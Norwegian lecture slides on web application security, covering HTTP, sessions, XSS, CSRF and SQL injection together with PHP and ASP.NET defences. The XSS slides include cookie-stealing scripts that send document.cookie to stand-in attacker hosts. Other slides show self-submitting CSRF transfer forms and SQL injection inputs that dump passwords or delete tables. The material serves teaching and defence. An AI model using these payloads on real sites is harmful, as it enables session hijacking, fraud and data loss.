1. Koble opp mot tjener 2. Send forespørsel. 3. Send respons 4. Lukk forbindelsen. Klient Tjener

Størrelse: px
Begynne med side:

Download "1. Koble opp mot tjener 2. Send forespørsel. 3. Send respons 4. Lukk forbindelsen. Klient Tjener"

Transkript

1 Web sikkerhet

2 Klient/tjener 1. Koble opp mot tjener 2. Send forespørsel 3. Send respons 4. Lukk forbindelsen Klient Tjener

3 HTTP GET GET HTTP/1.1 Host: kark.hin.no User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-no; rv: ) Gecko/ Firefox/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai n;q=0.8,image/png,*/*;q=0.5 Accept-Language: nb,no;q=0.8,nn;q=0.6,en-us;q=0.4,en;q=0.2 Accept-Encoding: gzip,deflate Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer:

4 HTTP response HTTP/ OK Date: Mon, 10 Mar :45:47 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Mon, 10 Mar :45:24 GMT ETag: "fb0641-ad-398c9100" Accept-Ranges: bytes Content-length: 173 Connection: close Content-Type: text/html; charset=iso <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>test</title> </head> <body> <h1>dette er et test dokument</h1> </body> </html>

5 HTTP POST POST HTTP/1.1 Host: kark.hin.no User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-no; rv: ) Gecko/ Firefox/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,ima ge/png,*/*;q=0.5 Accept-Language: nb,no;q=0.8,nn;q=0.6,en-us;q=0.4,en;q=0.2 Accept-Encoding: gzip,deflate Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: Cookie: utmz= utmccn=(direct) utmcsr=(direct) utmcmd=(none); utma= Content-Type: multipart/form-data; boundary= Content-length: Content-Disposition: form-data; name="max_file_size" Content-Disposition: form-data; name="action" POST

6 GET / POST POST bør benyttes når aksjon medfører permanent endring på tjener GET laster ned informasjon POST sender informasjon GET kan lastes på nytt av nettleser uten konsekvenser POST benyttet ved for eksempel regningsbetaling i bank Regel: Kan ikke gjentas Nettleser må advare bruker Benytt POST når aksjonen har konsekvenser

7 GET / POST Klienten har full kontroll over hva som sendes til tjener Kan endres manuelt Editering av filer Bruk av proxy slik som Webscarab alle forespørsler kan endres Endres automatisk av et program Sett fra tjenersiden Klient side sikkerhet eksisterer ikke!

8 Referer Header Settes av de fleste nettlesere og vil inneholde siden som forespørselen stammer i fra Når bruker trykker på en hyperlenke Et bilde, applet eller objekt inkluderes i siden Kan lekke ut informasjon til 3part Lagres også i historikk for nettleser Eksempel fra logg: Ikke send med sensitiv informasjon som en del av URL Benytt POST istedenfor GET for sensitiv informasjon

9 Cookies Benyttes for å gjøre HTTP statefull Små informasjonskapsler som lagres på klient Sendes med for hver forespørsel til opprinnelses stedet i HTTP meldingshodet Server setter innhold i respons Definert i RFC 2109 og RFC 2965 Eksempel: Response for setting av cookie Set-Cookie: PHPSESSID=shmcss59c6mkkrei8uvrueufc7; path=/ Eksempel: Forespørsel som returnerer cookie Cookie: PHPSESSID=shmcss59c6mkkrei8uvrueufc7

10 Sesjoner HTTP er en tilstandsløs protokoll Sesjoner benyttes bøte på dette Sesjonsdata lagres i et sesjonsobjekt slik at en tar vare på hva brukeren/klienten har utført tidligere For eksempel innlogging Et sesjons angrep innebærer å få ta i en annen brukers sesjon og dermed få tilgang til en applikasjon med en annen brukers rettigheter

11 Sesjoner PHPSESSID=shmcss59c6mkkrei8uvrueufc7 19r 11f1 dfdf Klient Tjener PHPSESSID=shmcss59c6mkkrei8uvrueufc7

12 Sesjons kapring En sesjon kjennetegnes av en sesjons id En trenger kun gjette et enkelt tall Trenger ikke brukernavn eller passord Sesjons id oppbygging må være sikker Dynamisk, endres for hver ny sesjon Benytt server generert sesjons id SesjonsID må ikke lekke ut Ikke sendes med som del av URL Benytt HTTPS Ikke lekke ut ved Cross Site Scripting (XSS)

13 Sesjons kapring Sesjons id må beskyttes! Andre tiltak: Ta vare på IP adressen for klient og lagre denne i sesjonsobjektet. Ved alle forespørsler verifiseres at IP adressen for henvendelsen er lik IP lagret i sesjonsobjektet Dersom ulik IP slett sesjonen Alternativ kan være å ta vare på nettleser i tillegg (User-Agent)

14 Sesjons kapring Generer alltid en ny sesjons ID når en bruker har logget inn Ofte opprettes en sesjon når klienten besøker et åpent webområdet Senere logger klienten inn ofte over HTTPS Sesjons id som var synlig over HTTP kan nå benyttes over HTTPS av angriper for å gi seg ut som klienten PHP løsning: session_regenerate_id() genererer ny sessionid, sesjonsinformasjon beholdes, fra og med PHP 4.3.3

15 Cross Site Scripting (XSS) 3. Skript kjører i nettleser hos klient, sender session cookie til angriper Angriper 4. Angriper benytter session cookie og opptrer som klient ovenfor webtjener 1. Angriper plassere skript på webtjener Webtjener 3. Tjener sender session cookie og angripers skript til en klient 2. Klient besøker webområdet Klient/offer

16 Cross Site Scripting (XSS) Årsak til problemet kan være Bugs i nettleser eller webtjener Feil i webapplikasjon Manglende filtrering av brukerinput Brukerinput vises til andre brukere Javascript kode vil kjøre i nettleser for annen bruker

17 Cross Site Scripting (XSS) XSS baserer seg på at en angriper lagrer/sender med et Javascript til siden som pga. manglende validering av input data vises til andre brukere Eksempel på et uskyldig skript

18 Cross Site Scripting (XSS) XSS oppstår når en hyperlenke inneholder en URL med et innebygd skript Og URL peker til en annen webtjener <h1>dette er et dårlig nettsted</h1> <a href= Hei\x20der%20)</script> >Klikk her!</a> Skript utføres som om det kommer fra det original nettstedet For nettleseren ser det ut som det kommer derfra Skript kjøres selv om nettstedet ikke skal kunne kjøre skript (for eksempel en annen sone i IE)

19 Cross Site Scripting (XSS) DOM referanser behandles som om de kom fra det originale nettstedet Mest kritisk, cookies blir tilgjengelige, angriper kan lett laste ned cookies som kun var tilgjengelig for det originale nettstedet Cookie kan inneholde nødvendig informasjon for innlogging - Remember me på nettsteder Kode for nedlasting av alle cookies fra dette nettstedet: Var = Document.cookie; document.location(http://attacker/cgi? + escape(var));

20 Cross Site Scripting (XSS) Eksempel skript som sender nettleser til angripers skript, cookie er parameter som sendes med: <script> document.location.replace( +?what= + document.cookie); </script> Eksempel skript som setter inn bilde med opphav i angripers skript, cookie er parameter som sendes med. Skript produserer et 1x1 piksels bilde som ikke ses av klient. <script> document.write("<img src=http://badguy.com/steal.php?what="); document.write(document.cookie); document.write(" />"); </script>

21 Hvordan unngå XSS? Input fra brukere/klienter innebærer alltid en risiko Input må ALLTID valideres Flere kjente sikkerhetsproblemer på webområder skyldes dårlig validering av brukerinput PHP funksjoner til hjelp: addslashes() ikke alltid nødvendig, dersom PHP er satt opp med magic_quotes_gpc, denne er som standard påslått og vil gjøre dette automatisk på POST og GET data mysql_real_escape_string() htmlspecialchars() strip_tags() Konvertering av strenger til tall når input er numerisk

22 Hvordan unngå XSS? Skal input data kunne inneholde HTML kode? Hvis ikke erstatt nødvendige HTML koder med tilsvarende karakter koder Skal input data kunne inneholde noen gyldige HTML koder, mens andre må filtreres? Fjern eller erstatt ugyldige HTML koder Kan være vanskelig

23 htmlspecialchars() string htmlspecialchars ( string string [, int quote_style [, string charset]] ) Konverter spesialtegn til HTML koder '&' (ampersand) blir '&' '"' (double quote) blir '"' ''' (single quote) blir '&#039;' bare når ENT_QUOTES er satt. '<' (less than) blir '<' '>' (greater than) blir '>' <?php $new = htmlspecialchars("<a href='test'>test</a>", ENT_QUOTES); echo $new; // <a href=&#039;test&#039;>test</a>?>

24 ASP.NET Server.HtmlEncode() public string HtmlEncode( string s ) Tilsvarende htmlspecialchars() i php ASP.NET har automatisk validering av input Page validaterequest= true" %> er standard, dette medfører at alle potensielt farlige tegn vil kaste en exception f.eks <SCRIPT> blokker Følgende kode ble imidlertid ikke fanget opp, må da benytte HtmlEncode() manuelt <img src="" onclick="alert(1)"/>; HtmlEncode() vil endre til: <img src="" onclick="alert(1)"/>

25 strip_tags() string strip_tags ( string str [, string allowable_tags]) Benyttes for å fjerne alle HTML pg PHP tags fra en gitt streng. Kan spesifisere hvilke tags som er tillatt som ekstra parameter Eksempel <?php Forandrer ikke atributter for tillatte tags kan være en sikkerhetsrisiko $string = strip_tags($string, '<a><b><i><u>');?>

26 ASP.NET input validering Validerings kontroller RequiredFieldValidator krever at brukeren fyller ut et felt RangeValidator sjekker verdier for et gyldig område (min maks verdi) CompareValidator sammenligner felt eller sjekk for datatype RegularExpressionValidator sammenligner et felt mot ved bruk av Regular Expressions CustomValidator egen skreddersydd validering ValidationSummary viser sammendrag av alle valideringsfeil

27 Page.IsValid Page.IsValid egenskapen for en side vil angi om en side som benytter validering er gyldig eller ikke, Må alltid sjekke denne i tjenerkoden for verdien true. Dersom denne verifikasjonen utelates vil tjenerkoden kunne motta ugyldige data i et eller flere skjemafelt.

28 RequiredFieldValidator <script runat="server"> protected void button_click(object sender, EventArgs e) { if (Page.IsValid) melding.text = "Validering OK"; else melding.text = "Validering Feilet "; } </script> <form id="form1" runat="server"> <asp:textbox id="fornavn" Text="Fornavn" runat="server"/> <asp:requiredfieldvalidator id="requiredfieldvalidator1" ControlToValidate="fornavn" Text="Skriv fornavn!" InitialValue="Fornavn" SetFocusOnError="true" runat="server"/> <asp:button id="button1" OnClick="Button2_click" runat="server" Text="Valider"/><br /> <asp:label ID="melding" runat="server"></asp:label> </form>

29 Session fixation Beskrevet av Mitja Kolŝek i 2002 Angriperen får aksess til sesjonsid før offeret For områder som benytter sesjonsid i URL Angriper besøker webområder, mottar sesjonsid Angriper lurer offer til å besøke via URL som inneholder angripers sesjonsid Angriper venter på at bruker logger inn Besøker så webområdet igjen og har full tilgang til innloggest sesjon

30 Cross-site site request forgery Session-riding (XSRF) Baserer seg på at webtjener ikke klare å skille mellom autentiske forespørsler og forespørsler basert på at brukeren er lurt Etter at brukeren er autentisert lures han til å klikke på en hyperlenke eller besøke en webside Resultatet er falske forespørsler generert For eksempel, etter at bruker er autentisert mot bank.com <a href= bank.com/transfer.php?amount=100&to= >Click</a> Eller enda enklere, krever ikke at brukeren gjør noe. Kun besøker denne websiden <img src= bank.com/transfer.php?amount=100&to= />

31 XSRF POST beskytter ikke, JavaScript kan sende POST forspørsel automatisk <form action="bank.com/transfer" method="post"/> <input type="hidden" name="to" value=" "/> <input type="hidden" name="amount" value="100000"/> <input type="submit"/> </form > <script type="text/javascript"> document.forms [0]. submit (); </script >

32 Unngå session fixation og XSRF Generer alltid en ny sesjons ID når en bruker har logget inn Dropp støtte for gammel sesjonsid Mer om dette senere...

33 SQL injection Eksempel fra et online spill for noen år siden login: john' -- password: SQL spørring SELECT * FROM users WHERE user='john' -- 'AND password=''; Resultat: Innlogging uten passord

34 SQL injection Eksempel viser hvordan metategnet medfører at SQL parseren tror at tekststrengen er slutt og vil se etter en ny SQL kommando Alle metategn må identifiseres og ufarliggjøres ved escaping Noen plattformer gjør dette automatisk, bla. PHP og ASP.NET

35 SQL injection - eksempel uten quotes Eksempel uten quotes VBscript med følgende kode: custid = Request.QueryString( id ); Query = SELECT * FROM Customer WHERE CustId= & custid; custid skal være numerisk pga ingen quotes, angriper legger inn 1; DELETE FROM Customer Spørringen endres til: SELECT * FROM Customer WHERE CustId=1; DELETE FROM Customer

36 SQL Injection Real-life example Computerworld.dk 2002, nytt system for betaling på web Noen la følgende ut i et fora I guess it would even be possible to knock the server down just by visiting (Hey, don't do it!) Noen prøvde dette selvsagt og MS SQL tjeneren kjørte SHUTDOWN, gjentok seg flere ganger

37 Fjern debug utskrift Debug informasjon beregnet for utviklere må fjernes før levering til kunde Skriv heller til fil Viser tabellinformasjon til inntrenger:

38 Directory browsing Gir mye informasjon om filstruktur og filer Her tilbys all kildekoden,.inc filer vil normalt ikke behandles av PHP før de sendes til klient

39 mysql_real_escape_string() string mysql_real_escape_string ( string unescaped_string [, resource link_identifier]) Funksjonen vil erstatte spesielle tegn i unescaped_string, men tar samtidig hensyn til gjeldende karaktersett, slik at det er sikkert å benytte den returnerte strengen i et mysql_query(). Må benyttes for binær data.

40 mysql_real_escape_string() Eksempel 1 <?php // Connect $link = mysql_connect('mysql_host', 'mysql_user', 'mysql_password') OR die(mysql_error()); // Query $query = sprintf("select * FROM users WHERE user='%s' AND password='%s'",?> mysql_real_escape_string($user), mysql_real_escape_string($password));

41 mysql_real_escape_string() Eksempel 2 <?php // Quote variable to make safe function quote_smart($value) { // Stripslashes if (get_magic_quotes_gpc()) { $value = stripslashes($value); } // Quote if not integer if (!is_numeric($value)) { $value = "'". mysql_real_escape_string($value). "'"; } return $value; } // Connect $link = mysql_connect('mysql_host', 'mysql_user', 'mysql_password') OR die(mysql_error()); // Make a safe query $query = sprintf("select * FROM users WHERE user=%s AND password=%s", quote_smart($_post['username']), quote_smart($_post['password'])); mysql_query($query);?>

42 mysql_real_escape_string() $userid = isset($_get['id'])? $_GET['id'] : 0; $userid = mysql_real_escape_string($userid); RunQuery("SELECT userid, username FROM sql_injection_test WHERE userid=$userid"); [ Tests: ] id=0 5. id=' 6. id=0 or 1 7. id=0 UNION ALL SELECT userid, CONCAT(username, ' ', password) FROM sql_injection_test WHERE 1 8. id=0 UNION ALL SELECT userid, CONCAT(username, CHAR(32), password) FROM sql_injection_test WHERE 1 Input antatt være numerisk, ikke angitt metategnet Nr 6 vil returrnere alle poster Nr 7 feiler, mens 8 utføres

43 mysql_real_escape_string() To mulige løsninger på problemet Legg på Konverter til numerisk (int) $userid = isset($_get['id'])? $_GET['id'] : 0; $userid = mysql_real_escape_string($userid); RunQuery("SELECT `userid`, `username` FROM `sql_injection_test` WHERE `userid` = '$userid'"); $userid = isset($_get['id'])? $_GET['id'] : 0; $userid = intval($userid); $userid = mysql_real_escape_string($userid); RunQuery("SELECT `userid`, `username` FROM `sql_injection_test` WHERE `userid` = '$userid'");

44 mysql_real_escape_string() $offset = isset($_get['o'])? $_GET['o'] : 0; $offset = mysql_real_escape_string($offset); RunQuery("SELECT userid, username FROM sql_injection_test LIMIT $offset, 10"); [ Tests: ] o=0 5. o=' 6. o=999999, 10 UNION ALL SELECT username, password FROM sql_injection_test LIMIT 0 Input antatt være numerisk, ikke angitt metategnet Nr 5 feiler Nr 6 viser alle poster

45 mysql_real_escape_string() Lløsning på problemet Konverter til numerisk (int) $offset = isset($_get['o'])? $_GET['o'] : 0; $offset = intval($offset); RunQuery("SELECT `userid`, `username` FROM `sql_injection_test` LIMIT $offset, 10"); // Ikke like solid... $offset = isset($_get['o'])? $_GET['o'] : 0; if (is_numeric($offset)) RunQuery("SELECT userid, username FROM sql_injection_test LIMIT $offset, 10"); is_numeric() slipper igjennom som medfører at spørringen feiler

46 SQL Injection løsning: Prepared statements Prepared statements skiller SQL og data Ingen metategn i dataene // ASP.NET SqlCommand cmd = new SqlCommand(); cmd.commandtext = "UPDATE student SET + " WHERE // Oppdaterings parametrer Request([ fornavn ]); Request([ studentid ]););

47 PHP mysqli_prepare() Eksempel <?php $mysqli = new mysqli('localhost', 'user', 'password', 'world'); /* check connection */ if (mysqli_connect_errno()) { printf("connect failed: %s\n", mysqli_connect_error()); exit(); } $stmt = $mysqli->prepare("insert INTO CountryLanguage VALUES (?,?,?,?)"); $stmt->bind_param('sssd', $code, $language, $official, $percent); $code = 'DEU'; $language = 'Bavarian'; $official = "F"; $percent = 11.2; /* execute prepared statement */ $stmt->execute();?>

48 Sikkerhetsbarriere mellom tjener og klient Klient Webtjener Hver gang data sendes fra tjener til klient passeres en sikkerhetsbarriere. Så snart dat har vært ute på klienten er de ikke lengre til å stole på.

49 Skjema svakheter HIDDEN felt i skjema Benyttes av ulike applikasjoner for å lagre ulik sesjonsinformasjon Alle HIDDEN felt kan endres av klient Må ikke benyttes for lagring av betydningsfull informasjon Javascript validering på klienten Klient kan enkelt gå rundt denne Ikke til å stole på

50 Skjema svakheter eksempel <form name= kjope action= URL method= POST <input type="hidden" name= delenr" value= 109 > <input type="hidden" name= pris" value= 199,95 > Antall: <input type= text" name= antall" value="1 size= 3 onchange= validate(this); > Pris kan endres på klient validate() funksjonen kan enkelt sløyfes enten ved å Slå av Javascipt i nettleser eller Ta kopi av kode Rediger denne og fjern Javascript kode Lagre filen lokalt og ta den så opp i en nettleser

51 Misforstått input vasking... Eksempel, et hjelpesystem for online betaling https://payment.example/help.asp?file=pay.txt Kode for å hindre katalog traversering filename = Request.QueryString("file") Replace(filename, "/", "\") Replace(filename, "..\", "") Aksess til serverside kildekode https://payment.example/help.asp?file=...//help.asp

52 Beskyttelse av skjema data Data som må sendes til klient kan beskyttes av hash kode, message autentication code (MAC) Funksjon i PHP beregner MAC hvor en hemmelig nøkkel også er en parameter <?php?> function getmac($value) { $key = "g4yierf39"; return sha1($key. $value.$key); } MAC og parameter inkluderes som hidden felt i skjema <form> <input type="hidden" name= customer-id" value= > <input type="hidden" name= customer-id-mac" value= 67669a333137aded508cdd16e8ec1070e >. </form> Når data kommer inn fra klient beregnes hash på nytt av parameter (her customer-id) og sammenlignes med den innkommende MAC (customer-id id-mac) Dersom disse ikke stemmer har klienten foretatt endringer i skjemadataene

53 Beskyttelse mot XSRF Sikkerhets token genereres av webapplikasjon og legges inn i alle websider med skjema som sendes klient Ved behandling av innsendt skjema verifiseres sikkerhets token Token må ha forventet verdi, hvis ikke avbrytes forespørsel Redusert varighet på sesjon Sørg for at brukerne logger seg ut før webområdet forlates

54 Beskyttelse mot <?php session_start(); function getmac($action_name) XSRF { } $key = "sha1"; $secret = "g4yierf39"; return hash_hmac ($key, $action_name + $secret, $_GLOBAL['PHP_SESSIONID']); function verifymac($action_name) { } $key = "sha1"; $secret = "g4yierf39"; $new_mac = hash_hmac ($key, $action_name + $secret, $_GLOBAL['PHP_SESSIONID']); if($new_mac == $_POST['XSFRPreventionToken']) echo "MAC ok" ; else { echo "MAC FAILURE!!!!!!"; // Log request exit(); }

55 Beskyttelse mot if (isset($_post['submit'])) { XSRF // Verifiser token verifymac( Betaling"); // Fortsett skjemabehandling dersom token ok } else {?> <form method="post"/> <input type="hidden" name="to" value=" "/> <input type="hidden" name="amount" value="100000"/> <! Legg til XSFR token --> <? printf("<input type=\"hidden\" value=\"%s\" name=\"xsfrpreventiontoken\">", getmac( Betaling"));?> <input type="submit" name="submit"/> </form > <? }?>

56 Validering av input Identifiser og valider all input Input kan være langt mer enn hva som kan skrives på et tastatur, ta høyde for dette Opprett funksjoner for validering Opprett funksjoner som validerer input i henhold til forventet type, for eksempel funksjoner som isvalid address isvalidcustomerid Sjekk tallområde Numerisk input kan ha begrensninger på lengde, men også område For eksempel en pris kan ikke være negativ Sjekk lengden på input data Sjekk for NULL bytes Skal aldri forekomme for ikke binære data (\0) Utfør input validering før noe annet

57 CAPTCHA CAPTCHA (Completely Automated Public Turing to tell Computers from Humans Apart) er et program som kan generere tester og vurdere disse som: De fleste mennesker kan passere Dagens dataprogram ikke kan passere For eksempel: mennesker kan lese forstyrret tekst i et bilde, men et dataprogram kan ikke dette Benyttes blant annet av skattedirektoratet for å hindre søkeprogrammer aksess til skattelistene Mange implementasjoner i PHP PEAR CAPTCHA ++++

User Input / Output Handling. Innocent Code kap 3-4 INF-329 Øystein Lervik Larsen oysteinl@ii.uib.no 7/11-05

User Input / Output Handling. Innocent Code kap 3-4 INF-329 Øystein Lervik Larsen oysteinl@ii.uib.no 7/11-05 User Input / Output Handling Innocent Code kap 3-4 INF-329 Øystein Lervik Larsen oysteinl@ii.uib.no 7/11-05 Oversikt Bruker-input (kap. 3) Hva er input? Validering av input Behandle ugyldig input Farer

Detaljer

Innocent Code Kapittel 1: The Basics Kapittel 2: Passing Data to Subsystems

Innocent Code Kapittel 1: The Basics Kapittel 2: Passing Data to Subsystems Innocent Code Kapittel 1: The Basics Kapittel 2: Passing Data to Subsystems INF329, høsten 2005 Utvikling av sikre applikasjoner Martin Lie martin@mq.no 2005-11-02 Kapittel 1: The Basics HTTP Sesjoner

Detaljer

Eksamen i Internetteknologi Fagkode: ITE1526

Eksamen i Internetteknologi Fagkode: ITE1526 Datateknikk Side 1 av 8 Eksamen i Internetteknologi Fagkode: ITE1526 Tid: Mandag, 23.05.05, 9:00-12:00 Tillatte hjelpemidler: Alle trykte og skrevne hjelpemidler tillatt. Eksamen består av 3 oppgaver og

Detaljer

Agenda. Data og grenser Kontekster XSS XSS og kompliserende kontekster Injection attacks Beskyttelse OWASP

Agenda. Data og grenser Kontekster XSS XSS og kompliserende kontekster Injection attacks Beskyttelse OWASP Når data krysser grenser Erlend Oftedal, BEKK Knut Vidar Siem, Objectware Communities in Action 10. mai 2010 Copyright The OWASP Foundation Permission is granted to copy, distribute and/or modify this

Detaljer

Eksamen i Internetteknologi Fagkode: IVA1379

Eksamen i Internetteknologi Fagkode: IVA1379 Høgskolen i Narvik Side 1 av 5 Eksamen i Internetteknologi Fagkode: IVA1379 Tid: Mandag, 07.06.04, 9:00-12:00 Tillatte hjelpemidler: Alle trykte og skrevne hjelpemidler tillatt. Eksamen består av 4 oppgaver

Detaljer

Oblig 5 Webutvikling. Av Thomas Gitlevaag

Oblig 5 Webutvikling. Av Thomas Gitlevaag Oblig 5 Webutvikling Av Thomas Gitlevaag For oppgave 1 og 2 skal dere levere en funksjonell webside på deres hjemmeområde. Dere skal også levere alle phps-filene slik at man for en hver side kan slenge

Detaljer

Erlend Oftedal. Risiko og sikkerhet i IKT-systemer, Tekna

Erlend Oftedal. Risiko og sikkerhet i IKT-systemer, Tekna Sikkerhet i Web 2.0 Erlend Oftedal Risiko og sikkerhet i IKT-systemer, Tekna Hva er spesielt med Web 2.0? Innhold fra flere kilder Sosiale nettsteder med brukergenerert innhold Mashups gjerne med innhold

Detaljer

Innføring i bruk av CGI4VB

Innføring i bruk av CGI4VB Innføring i bruk av CGI4VB Her kommer en enkel innføring i bruk av modulen CGI4VB som kan benyttes for å lage CGI programmer i Visual Basic. CGI er en forkortelse for Common Gateway Interface den kommunikasjonsprotokollen

Detaljer

Innføring i bruk av CGI4VB

Innføring i bruk av CGI4VB Innføring i bruk av CGI4VB Her kommer en enkel innføring i bruk av modulen CGI4VB som kan benyttes for å lage CGI programmer i Visual Basic. CGI er en forkortelse for Common Gateway Interface den kommunikasjonsprotokollen

Detaljer

JSP - 2. Fra sist. Hvordan fungerer web? Tjenerside script HTML. Installasjon av Web-tjener Et enkelt JSP-script. Ønsker dynamiske nettsider:

JSP - 2. Fra sist. Hvordan fungerer web? Tjenerside script HTML. Installasjon av Web-tjener Et enkelt JSP-script. Ønsker dynamiske nettsider: Fra sist JSP - 2 Installasjon av Web-tjener Et enkelt JSP-script HTML statisk Forms Tags Ønsker dynamiske nettsider: Klientside-script/programmering Javascript, vbscript, applets Tjenerside-script/programmering

Detaljer

Pen- tes'ng av webservices. Asbjørn Reglund Thorsen Gruppe- og utviklingsleder UIO/FSAT TwiDer: @fuzzerman

Pen- tes'ng av webservices. Asbjørn Reglund Thorsen Gruppe- og utviklingsleder UIO/FSAT TwiDer: @fuzzerman Pen- tes'ng av webservices Asbjørn Reglund Thorsen Gruppe- og utviklingsleder UIO/FSAT TwiDer: @fuzzerman Om meg Gruppe- og utviklingsleder på FSAT Felles studieadministra'vt tjenestesenter Sikkerhetsekspert

Detaljer

Problem med innlogging til Sauekontrollen Web?

Problem med innlogging til Sauekontrollen Web? Problem med innlogging til Sauekontrollen Web? Riktig nettleser? Husk at det er kun Internet Explorer av nettlesere som kan brukes (ikke for eksempel Opera, Mozilla Firefox, Safari). Riktig brukernavn

Detaljer

Sikkerhet og internett. Kan vi være vi trygge? Kan vi beskytte oss? Bør vi slå av nettet

Sikkerhet og internett. Kan vi være vi trygge? Kan vi beskytte oss? Bør vi slå av nettet Sikkerhet og internett Kan vi være vi trygge? Kan vi beskytte oss? Bør vi slå av nettet Stoler du på denne mannen? 28.01.2009 Om sikkerhet på Internettet ved Hans Nordhaug 2 Jepp Derfor fant du i januar

Detaljer

Dette er en demonstrasjonsside som vi skal bruke for å se litt nærmere på HTTP protokollen. Eksemplet vil også illustrere et par ting i PHP.

Dette er en demonstrasjonsside som vi skal bruke for å se litt nærmere på HTTP protokollen. Eksemplet vil også illustrere et par ting i PHP. 1 Dette er en demonstrasjonsside som vi skal bruke for å se litt nærmere på HTTP protokollen. Eksemplet vil også illustrere et par ting i PHP. (Læreboka kapittel 2-5) Legg merke til den første blokken,

Detaljer

En bedre verden med AJAX

En bedre verden med AJAX En bedre verden med AJAX Frode Eika Sandnes Hva er AJAX Har ikke noe med rengjøringsmidler å gjøre AJAX er et (morsomt) akronym Asynchronous Javascript And XML Henskikt: lage interaktive webapplikasjoner

Detaljer

9. ASP med databasekopling, del II

9. ASP med databasekopling, del II Else Lervik 23.03.2004 Opphavsrett: Forfatter og Stiftelsen TISIP Lærestoffet er utviklet for faget LV192D Web-programmering med ASP 9. Resymé: I forrige leksjon så vi hvordan ASP kunne brukes til å vise

Detaljer

Velkommen til Pressis.

Velkommen til Pressis. 1 Velkommen til Pressis. Dette er et veiledende dokument med linker i innledningen. Veiledningene vil ta deg igjennom de forskjellige tilkoblings muligheter du har med oss. Hvis du bare har behov for en

Detaljer

Tilkobling og Triggere

Tilkobling og Triggere Tilkobling og Triggere Lars Vidar Magnusson October 12, 2011 Lars Vidar Magnusson () Forelesning i DAS 11.10.2011 October 12, 2011 1 / 25 Tilkobling med PHP PHP bruker databasespesifike moduler til å koble

Detaljer

Eksamen i Internetteknologi Fagkode: ITE1526

Eksamen i Internetteknologi Fagkode: ITE1526 Høgskolen i Narvik Side 1 av 5 Eksamen i Internetteknologi Fagkode: ITE1526 Tid: Torsdag 15.06.06, 9:00-12:00 Tillatte hjelpemidler: Alle trykte og skrevne hjelpemidler tillatt. Eksamen består av 1 oppgave

Detaljer

Feilmelding Årsak Løsning

Feilmelding Årsak Løsning Request for the permission of type 'System.Security.Permissions.EnvironmentPermission, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' failed Feil oppstod i Window.DialogWindow:

Detaljer

HØGSKOLEN I SØR-TRØNDELAG

HØGSKOLEN I SØR-TRØNDELAG HØGSKOLEN I SØR-TRØNDELAG Avdeling for informatikk og e-læring - AITeL Kandidatnr: Eksamensdato: 15. desember 2004 Varighet: Fagnummer: Fagnavn: Klasse(r): 3 timer LV197D Webprogrammering med PHP FU Studiepoeng:

Detaljer

Intentor Helpdesk - Installasjon Step #3: Microsoft Reporting Services

Intentor Helpdesk - Installasjon Step #3: Microsoft Reporting Services Intentor Helpdesk - Installasjon Step #3: Microsoft Reporting Services Dokumentasjon levert av: Prosjekt: Norsk Data Senter AS Installasjon av Intentor Helpdesk Norsk Data Senter AS e-post info@nds.no

Detaljer

Sikkerhet og internett

Sikkerhet og internett Sikkerhet og internett Kan vi være vi trygge? Kan vi beskytte oss? Bør vi slå av nettet Stoler du på denne mannen? 25.01.2008 Om sikkerhet på Internettet ved Hans Nordhaug 2 1 Nei? Og likevel er du på

Detaljer

Sikkerhet og Hacking. Forelesning 2 Hacking av nettsider. Tom Heine Nätt

Sikkerhet og Hacking. Forelesning 2 Hacking av nettsider. Tom Heine Nätt Sikkerhet og Hacking Forelesning 2 Hacking av nettsider Tom Heine Nätt Dagens forelesning Viktigste er å forstå hva som går å gjøre, ikke hvordan Selv om hvordan er en bonus Hva må en webhacker vite om

Detaljer

HØGSKOLEN I SØR-TRØNDELAG

HØGSKOLEN I SØR-TRØNDELAG HØGSKOLEN I SØR-TRØNDELAG Avdeling for informatikk og e-læring - AITeL Kandidatnr: Eksamensdato: 11. mai 2004 Varighet: Fagnummer: Fagnavn: Klasse(r): 3 timer LV197D Webprogrammering med PHP FU Studiepoeng:

Detaljer

2. Lage ASP.NET sider

2. Lage ASP.NET sider Avdeling for informatikk og e-læring, Høgskolen i Sør-Trøndelag Lage ASP.NET sider Grethe Sandstrak 08.09.2015 Lærestoffet er utviklet for faget LV199D Web-programmering med ASP.NET 2. Lage ASP.NET sider

Detaljer

Installasjon av webtjener

Installasjon av webtjener Installasjon av webtjener Installasjon/Konfigurering Installasjon av webtjener Oppsett av kataloger som skal være tilgjengelig på web Spesifisering av aksesskontroll - i henhold til sikkerhetspolitikk

Detaljer

Løsningsforslag til eksamen 24. november 2015

Løsningsforslag til eksamen 24. november 2015 Operativsystemer med Linux Løsningsforslag til eksamen 24. november 2015 Oppgave 1 a) Et OS deler tiden inn i små deler, typisk et hundredels sekund, og fordeler slike korte timeslices til alle prossene

Detaljer

Kap 3: Anvendelser av Internett

Kap 3: Anvendelser av Internett Kap 3: Anvendelser av Internett Hva er egentlig Internett? Skal studere de vanligste protokollene: Web E-post DNS Ansvarsområder og prosess-skille 1 Hva er egentlig Internett? Infrastruktur Tjenester Roller

Detaljer

Lynkurs i shellprogrammering under Linux

Lynkurs i shellprogrammering under Linux Lynkurs i shellprogrammering under Linux Interaktiv bruk av shell Shell/skall er en applikasjon som lar bruker taste inn tekstlige kommandoer til Linux en og en linje om gangen (leser linjer fra stdin).

Detaljer

Kapittel 11. Databasesikkerhet

Kapittel 11. Databasesikkerhet Kapittel 11 Databasesikkerhet Læringsmål: SQL-injection er en alvorlig sikkerhetsmessig trussel i webløsninger i dag. Etter å ha jobbet med dette kapittelet skal du forstå hvordan SQL-injection-angrep

Detaljer

Huldt & Lillevik Ansattportal. - en tilleggsmodul til Huldt & Lillevik Lønn. Teknisk beskrivelse

